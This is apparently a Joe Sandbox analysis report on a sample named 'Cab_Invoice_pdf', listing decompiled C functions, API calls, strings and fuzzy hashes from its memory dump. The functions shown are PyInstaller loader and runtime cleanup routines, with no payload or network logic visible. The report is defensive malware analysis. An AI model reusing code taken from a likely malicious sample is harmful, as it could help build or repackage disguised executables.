                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013264ad
                            0x013264a4
                            0x013264a0
                            0x01326492
                            0x01326462
                            0x0132643b
                            0x0132643b
                            0x01326440
                            0x01326446
                            0x013264c8
                            0x013264cc
                            0x013264cc
                            0x013263e0
                            0x013263e9
                            0x013263f1
                            0x013263f5
                            0x013263fc
                            0x01326402
                            0x01326404
                            0x01326406
                            0x0132640b
                            0x0132640b
                            0x0132640e
                            0x0132640e
                            0x00000000
                            0x01326404
                            0x013263de
                            0x013263cb
                            0x013263a3
                            0x01326304
                            0x0132625d
                            0x0132625d
                            0x01326260
                            0x01326291
                            0x01326291
                            0x01326293
                            0x013262a3
                            0x013262a8
                            0x013262ad
                            0x013262b3
                            0x013262b6
                            0x013262b8
                            0x00000000
                            0x013262ba
                            0x013262ba
                            0x013262c0
                            0x00000000
                            0x013262c2
                            0x013262cc
                            0x013262d1
                            0x013262d6
                            0x013262d9
                            0x013262df
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013262df
                            0x013262c0
                            0x01326295
                            0x01326295
                            0x00000000
                            0x01326295
                            0x01326262
                            0x01326262
                            0x01326268
                            0x00000000
                            0x0132626a
                            0x0132626a
                            0x0132626f
                            0x01326271
                            0x013262e1
                            0x013262e1
                            0x013262e7
                            0x013262e7
                            0x013262e9
                            0x0132627e
                            0x0132627e
                            0x0132627e
                            0x01326281
                            0x01326282
                            0x01326289
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01326271
                            0x01326268
                            0x01326260
                            0x01326257
                            0x01326227
                            0x01326200
                            0x01326200
                            0x01326205
                            0x0132620b
                            0x0132628c
                            0x01326290
                            0x01326290
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                            • String ID:
                            • API String ID: 2719235668-0
                            • Opcode ID: 39978136a3890c0a9e9d39e6b2dea88976777d75cd764bc54e76a22487a0f27c
                            • Instruction ID: 490073615fa8a6f556e13334bee73e99cd3a17d22bebe3cbb8ec7adc5f05c855
                            • Opcode Fuzzy Hash: 39978136a3890c0a9e9d39e6b2dea88976777d75cd764bc54e76a22487a0f27c
                            • Instruction Fuzzy Hash: CCD12AF1A04325ABDB35BF6C9843A6E7BF9AF0271CF04416DEE46A7285DB3199048790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013281FB, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E013281FB(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x133c838) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E013209EB(_t46);
							E01327D80( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E013209EB(_t47);
							E01327E7E( *((intOrPtr*)(_t74 + 0x88)));
						}
						E013209EB( *((intOrPtr*)(_t74 + 0x7c)));
						E013209EB( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E013209EB( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E013209EB( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E013209EB( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E013209EB( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0132836E( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x133c300) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E013209EB(_t31);
							E013209EB( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E013209EB(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E013209EB(_t74);
			}















                            0x01328203
                            0x01328207
                            0x0132820f
                            0x01328218
                            0x0132821d
                            0x01328224
                            0x0132822c
                            0x01328234
                            0x0132823f
                            0x01328245
                            0x01328246
                            0x0132824e
                            0x01328256
                            0x01328261
                            0x01328267
                            0x0132826b
                            0x01328276
                            0x0132827c
                            0x0132821d
                            0x0132827d
                            0x01328285
                            0x01328298
                            0x013282ab
                            0x013282b9
                            0x013282c4
                            0x013282c9
                            0x013282d2
                            0x013282da
                            0x013282db
                            0x013282e1
                            0x013282e4
                            0x013282e7
                            0x013282ee
                            0x013282f0
                            0x013282f4
                            0x013282fc
                            0x01328303
                            0x01328309
                            0x0132830a
                            0x0132830a
                            0x01328311
                            0x01328313
                            0x01328318
                            0x01328320
                            0x01328325
                            0x01328326
                            0x01328326
                            0x01328329
                            0x0132832c
                            0x0132832f
                            0x01328332
                            0x01328332
                            0x01328344

                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 0132823F
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327D9D
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DAF
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DC1
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DD3
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DE5
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DF7
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E09
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E1B
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E2D
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E3F
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E51
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E63
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E75
                            • _free.LIBCMT ref: 01328234
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01328256
                            • _free.LIBCMT ref: 0132826B
                            • _free.LIBCMT ref: 01328276
                            • _free.LIBCMT ref: 01328298
                            • _free.LIBCMT ref: 013282AB
                            • _free.LIBCMT ref: 013282B9
                            • _free.LIBCMT ref: 013282C4
                            • _free.LIBCMT ref: 013282FC
                            • _free.LIBCMT ref: 01328303
                            • _free.LIBCMT ref: 01328320
                            • _free.LIBCMT ref: 01328338
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 35918a40a5145d08d7cc8130b8e0126d95337bfac1abb0daf236ae2e41940fd9
                            • Instruction ID: 53c8aa4b8fa531ebe811bd7292aeb80c714b057b3129855e0c54e41c5e2a0d8c
                            • Opcode Fuzzy Hash: 35918a40a5145d08d7cc8130b8e0126d95337bfac1abb0daf236ae2e41940fd9
                            • Instruction Fuzzy Hash: B8317C316007229FFB25BA7ED845B5B77F8EF01618F10495AE59AD71A0DF31AC44CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01312210, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 131COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s.py$Could not get __main__ module's dict.$Could not get __main__ module.$Failed to execute script %s$Failed to unmarshal code object for %s$Name exceeds PATH_MAX$__file__$__main__
                            • API String ID: 0-2368408649
                            • Opcode ID: 37880bc331e4a1c061669ddbfe8e81de2e7fecb8a82c8177c0a567605a8465af
                            • Instruction ID: fccee037749153ab15a95ea8f1cbbed93eb4b509910f58fd01782a4dfe3d8732
                            • Opcode Fuzzy Hash: 37880bc331e4a1c061669ddbfe8e81de2e7fecb8a82c8177c0a567605a8465af
                            • Instruction Fuzzy Hash: BD417CB2904241ABD7289B3DEC0599B7B9CBF8432DF080A26F819D1289E634D144C7A7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01313230, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 105COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: Failed to get _MEIPASS as PyObject.$_MEIPASS$loads$marshal$mod is NULL - %s$strict$utf-8
                            • API String ID: 2009864989-3336796446
                            • Opcode ID: 9b3550047c65ffbdd004c16c7d477319e04c4202536c76fb288669e902293868
                            • Instruction ID: 379d61f6f502944b680c6947874db1f3651a7cbf25e4b9a7339b936b3acfa379
                            • Opcode Fuzzy Hash: 9b3550047c65ffbdd004c16c7d477319e04c4202536c76fb288669e902293868
                            • Instruction Fuzzy Hash: F5312B72500201BBD7283B7DAC098A77B6CBF4133DF094516F906E224AEA21E515C7A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01324331, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01324331(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x1335190) {
					E013209EB(_t52);
					_t26 = _a4;
				}
				E013209EB( *((intOrPtr*)(_t26 + 0x3c)));
				E013209EB( *((intOrPtr*)(_a4 + 0x30)));
				E013209EB( *((intOrPtr*)(_a4 + 0x34)));
				E013209EB( *((intOrPtr*)(_a4 + 0x38)));
				E013209EB( *((intOrPtr*)(_a4 + 0x28)));
				E013209EB( *((intOrPtr*)(_a4 + 0x2c)));
				E013209EB( *((intOrPtr*)(_a4 + 0x40)));
				E013209EB( *((intOrPtr*)(_a4 + 0x44)));
				E013209EB( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E013241F7(5,  &_v8);
				_v8 =  &_a4;
				return E01324247(4,  &_v8);
			}




                            0x01324337
                            0x0132433a
                            0x01324342
                            0x01324345
                            0x0132434a
                            0x0132434d
                            0x01324351
                            0x0132435c
                            0x01324367
                            0x01324372
                            0x0132437d
                            0x01324388
                            0x01324393
                            0x0132439e
                            0x013243ac
                            0x013243b4
                            0x013243bd
                            0x013243c5
                            0x013243d9

                            APIs
                            • _free.LIBCMT ref: 01324345
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01324351
                            • _free.LIBCMT ref: 0132435C
                            • _free.LIBCMT ref: 01324367
                            • _free.LIBCMT ref: 01324372
                            • _free.LIBCMT ref: 0132437D
                            • _free.LIBCMT ref: 01324388
                            • _free.LIBCMT ref: 01324393
                            • _free.LIBCMT ref: 0132439E
                            • _free.LIBCMT ref: 013243AC
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 074dc82ad75d8c45abbe877f3f1032b632e66457ec494eee6e442ac1df658a3f
                            • Instruction ID: a34deb2c0a6f41a3edc958bb7818b9b1a17d5b04330505ef6cb35815d45663c1
                            • Opcode Fuzzy Hash: 074dc82ad75d8c45abbe877f3f1032b632e66457ec494eee6e442ac1df658a3f
                            • Instruction Fuzzy Hash: 7811F876200519BFDB05FF59C882CDE3BB5EF15254B4140A2FA4A8F231DA31EE55DB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01313C70, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                            Download Yara Rule
                            C-Code - Quality: 64%
                            			E01313C70(void* __edx, char _a4, short _a36, signed int _a8228, intOrPtr _a8236, intOrPtr _a8240) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				signed int _t13;
				intOrPtr _t24;
				void* _t27;
				WCHAR* _t28;
				WCHAR* _t37;
				intOrPtr _t45;
				void* _t47;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t72;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				E01317880();
				_t13 =  *0x133c008; // 0xa3433343
				_a8228 = _t13 ^ _t74;
				_push(_t50);
				_t72 = _a8240;
				_v0 = _a8236;
				_push(_t57);
				if(_t72 == 0) {
					_t51 = _v0;
					L6:
					GetTempPathW(0x1000,  &_a36);
					E01314710(_t53,  &_a4, 0x10, L"_MEI%d", GetCurrentProcessId());
					_t75 = _t74 + 0x10;
					_t64 = 0;
					__eflags = 0;
					while(1) {
						_t58 = E0131F329( &_a36,  &_a4);
						_t24 = E01314B30();
						_t76 = _t75 + 0xc;
						__eflags = _t24;
						if(_t24 == 0) {
							break;
						}
						L01319803(_t58);
						_t64 = _t64 + 1;
						_t75 = _t76 + 4;
						__eflags = _t64 - 5;
						if(_t64 < 5) {
							continue;
						}
						__eflags = _t72;
						if(_t72 == 0) {
							L4:
							_t27 = 0;
							L18:
							E0131786A();
							return _t27;
						}
						_t37 = E01314BF0(0, "TMP", 0);
						__eflags = _t51;
						if(_t51 == 0) {
							_t68 = _t37;
							SetEnvironmentVariableW(_t37, 0);
							L01319803(_t68);
							_t77 = _t75 + 0x10;
							_t27 = 0;
						} else {
							_t61 = _t37;
							_t69 = E01314BF0(0, _t51, 0);
							E0131E1FC(_t37, _t40);
							L01319803(_t61);
							L01319803(_t69);
							L01319803(_t51);
							_t77 = _t75 + 0x2c;
							_t27 = 0;
						}
						goto L18;
					}
					E01314C90(_v0, _t58, 0x1000);
					L01319803(_t58);
					_t77 = _t76 + 0x10;
					__eflags = _t72;
					if(_t72 != 0) {
						_t28 = E01314BF0(0, "TMP", 0);
						__eflags = _t51;
						if(_t51 == 0) {
							_t66 = _t28;
							SetEnvironmentVariableW(_t28, 0);
							L01319803(_t66);
							_t77 = _t77 + 0x10;
						} else {
							_t60 = _t28;
							_t67 = E01314BF0(0, _t51, 0);
							E0131E1FC(_t28, _t31);
							L01319803(_t60);
							L01319803(_t67);
							L01319803(_t51);
							_t77 = _t77 + 0x2c;
						}
					}
					_t27 = 1;
					goto L18;
				}
				_push("TMP");
				_t45 = E01313E40(_t50, _t57);
				_push(_t72);
				_t51 = _t45;
				_t62 = E01313980();
				_t77 = _t74 + 8;
				if(_t46 == 0) {
					goto L4;
				}
				_t47 = E0131E1FC(L"TMP", _t62);
				L01319803(_t62);
				_t74 = _t77 + 0xc;
				_t83 = _t47;
				if(_t47 == 0) {
					goto L6;
				} else {
					_push("LOADER: Failed to set the TMP environment variable.\n");
					E01311910(_t83);
					_t77 = _t74 + 4;
					goto L4;
				}
			}























                            0x01313c75
                            0x01313c7a
                            0x01313c81
                            0x01313c8f
                            0x01313c91
                            0x01313c98
                            0x01313c9d
                            0x01313ca0
                            0x01313ceb
                            0x01313cef
                            0x01313cf9
                            0x01313d11
                            0x01313d16
                            0x01313d19
                            0x01313d19
                            0x01313d20
                            0x01313d2f
                            0x01313d32
                            0x01313d37
                            0x01313d3a
                            0x01313d3c
                            0x00000000
                            0x00000000
                            0x01313d3f
                            0x01313d44
                            0x01313d45
                            0x01313d48
                            0x01313d4b
                            0x00000000
                            0x00000000
                            0x01313d4d
                            0x01313d4f
                            0x01313ce4
                            0x01313ce4
                            0x01313e25
                            0x01313e32
                            0x01313e3d
                            0x01313e3d
                            0x01313d5a
                            0x01313d5f
                            0x01313d61
                            0x01313d97
                            0x01313d9c
                            0x01313da3
                            0x01313da8
                            0x01313dab
                            0x01313d63
                            0x01313d68
                            0x01313d6f
                            0x01313d73
                            0x01313d79
                            0x01313d7f
                            0x01313d85
                            0x01313d8a
                            0x01313d8d
                            0x01313d8d
                            0x00000000
                            0x01313d61
                            0x01313db9
                            0x01313dbf
                            0x01313dc4
                            0x01313dc7
                            0x01313dc9
                            0x01313dd4
                            0x01313dd9
                            0x01313ddb
                            0x01313e0c
                            0x01313e11
                            0x01313e18
                            0x01313e1d
                            0x01313ddd
                            0x01313de2
                            0x01313de9
                            0x01313ded
                            0x01313df3
                            0x01313df9
                            0x01313dff
                            0x01313e04
                            0x01313e04
                            0x01313ddb
                            0x01313e20
                            0x00000000
                            0x01313e20
                            0x01313ca2
                            0x01313ca7
                            0x01313cac
                            0x01313cad
                            0x01313cb4
                            0x01313cb6
                            0x01313cbb
                            0x00000000
                            0x00000000
                            0x01313cc3
                            0x01313ccb
                            0x01313cd0
                            0x01313cd3
                            0x01313cd5
                            0x00000000
                            0x01313cd7
                            0x01313cd7
                            0x01313cdc
                            0x01313ce1
                            0x00000000
                            0x01313ce1

                            APIs
                            • GetTempPathW.KERNEL32(00001000,?,?,?,00000000,00000000,01313C46,?,00000000,?,pyi-runtime-tmpdir), ref: 01313CF9
                            • GetCurrentProcessId.KERNEL32 ref: 01313CFF
                              • Part of subcall function 01313E40: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,013124FE,_MEIPASS2), ref: 01313E76
                              • Part of subcall function 01313E40: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,013124FE,_MEIPASS2), ref: 01313E92
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 01313D9C
                              • Part of subcall function 01314C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,01344A58,?,00001000,?,?), ref: 01314CAA
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,?,?,00000000,0131210F,?,?), ref: 01313E11
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Environment$Variable$ByteCharMultiWide$CurrentExpandPathProcessStringsTemp
                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                            • API String ID: 2172272190-1116378104
                            • Opcode ID: aa9b0250f6e3227b7d60ad6e583880dd18188a6b8538f374ca320dcd8e24d09a
                            • Instruction ID: 24146a5e9725ad113699d02936d09b39c3f5bc0ac5f1ebc10a20bbd7c0cfa954
                            • Opcode Fuzzy Hash: aa9b0250f6e3227b7d60ad6e583880dd18188a6b8538f374ca320dcd8e24d09a
                            • Instruction Fuzzy Hash: EB413AB2A00302B7E32972BC9C45F6F799CAFA565CF090436FE089614AFA55990443F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01313980, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E01313980(short _a8192, signed int _a16384, intOrPtr _a16392) {
				short _v0;
				void* __edi;
				signed int _t14;
				signed int _t19;
				void* _t43;
				WCHAR* _t57;
				signed int _t58;
				WCHAR* _t65;
				signed int _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				E01317880();
				_t14 =  *0x133c008; // 0xa3433343
				_a16384 = _t14 ^ _t69;
				_t57 = E01314BF0(0, _a16392, 0);
				_t70 = _t69 + 0xc;
				_t82 = _t57;
				if(_t57 != 0) {
					_t19 = ExpandEnvironmentStringsW(_t57,  &_a8192, 0x1000);
					L01319803(_t57);
					_t71 = _t70 + 4;
					__eflags = _t19;
					if(__eflags != 0) {
						_t65 = E0131D518(0,  &_a8192, 0x1000);
						_t72 = _t71 + 0xc;
						__eflags = _t65;
						if(__eflags != 0) {
							E01318520(_t57,  &_v0, 0, 0x2000);
							_push(0x5c);
							_push(_t65);
							_t58 = E013188E7(_t43);
							_t73 = _t72 + 0x14;
							__eflags = _t58;
							while(_t58 != 0) {
								E0131DC18( &_v0, _t65, (_t58 - _t65 >> 1) + 1);
								CreateDirectoryW( &_v0, 0);
								_t11 = _t58 + 2; // 0x2
								_push(0x5c);
								_t58 = E013188E7((_t58 - _t65 >> 1) + 1);
								_t73 = _t73 + 0x14;
								__eflags = _t58;
							}
							CreateDirectoryW(_t65, 0);
							__eflags = _a16384 ^ _t73;
							E0131786A();
							return _t65;
						} else {
							_push("LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n");
							E01311910(__eflags);
							__eflags = _a16384 ^ _t72 + 0x00000004;
							E0131786A();
							return 0;
						}
					} else {
						_push("LOADER: Failed to expand environment variables in the runtime-tmpdir.\n");
						E01311910(__eflags);
						__eflags = _a16384 ^ _t71 + 0x00000004;
						E0131786A();
						return 0;
					}
				} else {
					_push("LOADER: Failed to convert runtime-tmpdir to a wide string.\n");
					E01311910(_t82);
					E0131786A();
					return 0;
				}
			}
















                            0x01313985
                            0x0131398a
                            0x01313991
                            0x013139aa
                            0x013139ac
                            0x013139af
                            0x013139b1
                            0x013139e7
                            0x013139f0
                            0x013139f5
                            0x013139f8
                            0x013139fa
                            0x01313a36
                            0x01313a38
                            0x01313a3b
                            0x01313a3d
                            0x01313a72
                            0x01313a77
                            0x01313a79
                            0x01313a85
                            0x01313a87
                            0x01313a8a
                            0x01313a8c
                            0x01313a9e
                            0x01313aad
                            0x01313aaf
                            0x01313ab2
                            0x01313aba
                            0x01313abc
                            0x01313abf
                            0x01313abf
                            0x01313ac6
                            0x01313ad4
                            0x01313ad6
                            0x01313ae1
                            0x01313a3f
                            0x01313a3f
                            0x01313a44
                            0x01313a57
                            0x01313a59
                            0x01313a64
                            0x01313a64
                            0x013139fc
                            0x013139fc
                            0x01313a01
                            0x01313a14
                            0x01313a16
                            0x01313a21
                            0x01313a21
                            0x013139b3
                            0x013139b3
                            0x013139b8
                            0x013139cc
                            0x013139d7
                            0x013139d7

                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,0131210F,?,?,00000000,?,00000000), ref: 013139E7
                            Strings
                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 01313A3F
                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 013139B3
                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 013139FC
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentExpandMultiStringsWide
                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                            • API String ID: 2001182103-3498232454
                            • Opcode ID: 3f19b5da4be23502a0584aed214f34de9ac9b31c999d7ce4b0ab1fc985455b0f
                            • Instruction ID: 0c432d8833810cf058dfe687b0fcf65ad26ba84c97e932b2e8611fcf4b7a2f74
                            • Opcode Fuzzy Hash: 3f19b5da4be23502a0584aed214f34de9ac9b31c999d7ce4b0ab1fc985455b0f
                            • Instruction Fuzzy Hash: 3C31FEB2B403016BE238B2BCAC46F9FB389AF94664F440525FF49D7285F9749500C2DB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314A10, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 105COMMON
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E01314A10(void* __ecx, void* __edx, void* __eflags) {
				int* _t18;
				char* _t21;
				short* _t22;
				char* _t28;
				int* _t31;
				void* _t34;
				char* _t36;
				int* _t41;
				signed int _t42;
				signed int _t44;
				int _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_t34 = __edx;
				_t44 =  *(_t46 + 0x14);
				_push(4);
				_push(_t44 + 1);
				_t18 = E013197F8(__ecx);
				_t31 = _t18;
				_t47 = _t46 + 8;
				if(_t31 != 0) {
					_t36 = 0;
					__eflags = _t44;
					if(_t44 <= 0) {
						L16:
						_t31[_t44] = 0;
						return _t31;
					} else {
						_t41 = _t31;
